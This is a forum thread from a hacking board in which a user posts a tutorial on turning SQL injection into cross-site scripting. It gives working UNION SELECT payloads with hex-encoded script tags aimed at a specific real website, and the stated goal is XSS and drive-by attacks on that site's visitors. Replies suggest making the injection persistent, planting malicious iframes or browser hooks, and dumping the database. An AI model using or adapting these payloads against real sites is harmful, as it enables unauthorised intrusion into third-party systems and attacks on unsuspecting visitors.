EvilZone
Hacking and Security => Tutorials => : M1lak0 October 16, 2014, 02:21:28 PM
-
Why to add html?
Ok the reason why we do this is to execute xss and drive-by and we can effect the visitors using this..
It increases our attack vactors and its an example of how sqli can carry out attacks to effect the users/visitors..
Here is a way I found to add html with sql injection:
Click on it:
http://old.cageprisoners.com/articles.php?id=-25632 UNION ALL SELECT 1,2,concat(0x3c7363726970743e616c6572742827,version(),0x27293b3c2f7363726970743e) ,4,5,6-- - (http://old.cageprisoners.com/articles.php?id=-25632 UNION ALL SELECT 1,2,concat(0x3c7363726970743e616c6572742827,version(),0x27293b3c2f7363726970743e) ,4,5,6-- -)
It'll popup with the db version :)
Next you can add more tags like <h1></h1> shit and stuff with
http://old.cageprisoners.com/articles.php?id=-25632 UNION%20ALL SELECT 1,2,concat(0x3c68313e4920676f7420746865206461746162617365206261627920697420697320,version%28%29,0x3c2f68313e) ,4,5,6--%20- (http://old.cageprisoners.com/articles.php?id=-25632 UNION%20ALL SELECT 1,2,concat(0x3c68313e4920676f7420746865206461746162617365206261627920697420697320,version%28%29,0x3c2f68313e) ,4,5,6--%20-)
convert the tag <script>alert(' into hexa which is:
3c7363726970743e616c6572742827
so 0x3c7363726970743e616c6572742827
next convert the tag ');</script> into hexa which is:
27293b3c2f7363726970743e
so 0x27293b3c2f7363726970743e
we need <script>alert('version()');</script>
so,
concat(0x3c7363726970743e616c6572742827,version(),0x27293b3c2f7363726970743e) is what we will do and check the results..
Further experiemnt:
I tried injecting php codes too but i couldn't and failed..
Injecting php codes could take this attack to a much higher level.
Please share any of your new methods regarding this if you find..
Hexa converter:
http://www.string-functions.com/string-hex.aspx (http://www.string-functions.com/string-hex.aspx)
Hope this was interesting to you.. :)
-
Please take this as constructive criticism, but the way you presented this is absolutely fucking useless. You're not inserting them into columns, or anything that would make them persistent. Nobody is going to click on that long of a url without questioning your intentions. Don't misunderstand me, what you have is good; however, it is completely useless without inserting it into the database.
Additionally, you could have stated *WHY* somebody would want to inject xss over SQL. One example I can think of would be injecting javascript for a drive-by download or client-side exploit/malicious iframe/beef hook. Step your game up son!
-
Ok well thankx.. I made very quickly as I had to switch off my system but wanted one up there in EZ.. Will surely take care about it brother.. :)
Also I the long url is for the purpose so that everybody get the url and understand it..
I don't post any bad url or malwared here.. Its completely for learning purpose..
-
if you can access database you can simply edit fields adding html, don't you?
-
u should support to find out the database and draw the table xD instead of turning sql into xss. if u own the page.. u can do other malicious intention attack
-
Please take this as constructive criticism, but the way you presented this is absolutely fucking useless. You're not inserting them into columns, or anything that would make them persistent. Nobody is going to click on that long of a url without questioning your intentions. Don't misunderstand me, what you have is good; however, it is completely useless without inserting it into the database.
Additionally, you could have stated *WHY* somebody would want to inject xss over SQL. One example I can think of would be injecting javascript for a drive-by download or client-side exploit/malicious iframe/beef hook. Step your game up son!
-
if you can access database you can simply edit fields adding html, don't you?
u should support to find out the database and draw the table xD instead of turning sql into xss. if u own the page.. u can do other malicious intention attack
Dear, Its not always necessary that you exploit it every time and you get access to the credentials every time, you know if you tried sequel injection.. :)
Here it creates more attack vectors you see.. Think of its advantage rather discouraging..
-
It's nice to know but like they said above, nobody is gonna click on a link that long. But this could be usefull.